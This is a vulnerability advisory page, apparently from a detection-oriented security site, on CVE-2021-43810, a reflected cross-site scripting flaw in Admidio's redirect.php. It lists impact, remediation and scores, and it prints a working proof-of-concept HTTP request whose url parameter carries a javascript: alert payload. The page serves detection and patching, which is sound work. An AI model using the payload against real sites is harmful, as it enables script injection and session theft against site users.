🔙 목록으로 돌아가기

CVE-2021-43810: Admidio - Cross-Site Scripting

TitleAdmidio - Cross-Site Scripting
Authorgy741
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to version 4.0.12 or later.
CVSS Score6.1
EPSS Score0.62973
CVE IDCVE-2021-43810
CWE IDCWE-79
Tags cve2021 cve admidio xss vuln

🔍 Vulnerability Description

A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.

🌐 HTTP Request

GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43810.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-43810.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A